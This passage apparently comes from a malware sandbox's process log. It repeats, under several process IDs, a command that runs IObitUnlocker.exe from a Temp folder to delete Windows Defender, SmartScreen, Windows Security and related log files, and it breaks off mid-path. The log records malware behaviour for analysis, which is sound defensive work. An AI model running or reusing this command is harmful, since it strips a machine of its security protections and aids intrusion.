                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 